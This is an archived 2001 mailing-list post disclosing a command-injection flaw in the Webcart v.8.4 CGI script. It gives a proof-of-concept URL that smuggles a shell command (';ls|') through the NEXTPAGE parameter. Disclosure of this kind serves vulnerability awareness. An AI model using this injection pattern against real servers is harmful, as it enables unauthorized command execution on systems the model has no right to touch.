Webcart v.8.4

From: rootat_private
Date: Thu Oct 18 2001 - 20:29:24 PDT

Next message: arivanovat_private: "RE: multiple looking-glasses input vulnerability"

Previous message: Stephen C Burns: "Problem with Microsoft Security Bulletin MS01-052"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Webcart v.8.4 by Mountain Network Systems, Inc., 
 
 
This script has vulnerability (does not filter input of the 
user) which allows to carry out commands from 
WebServer.


 
EXPLOIT:
http://www.server.com/cgi-bin/webcart/webcart.cgi?
CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
 


------------------------------------------------- 
Everyone should have http://www.freedom2surf.net/

Next message: arivanovat_private: "RE: multiple looking-glasses input vulnerability"
Previous message: Stephen C Burns: "Problem with Microsoft Security Bulletin MS01-052"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 15:06:19 PDT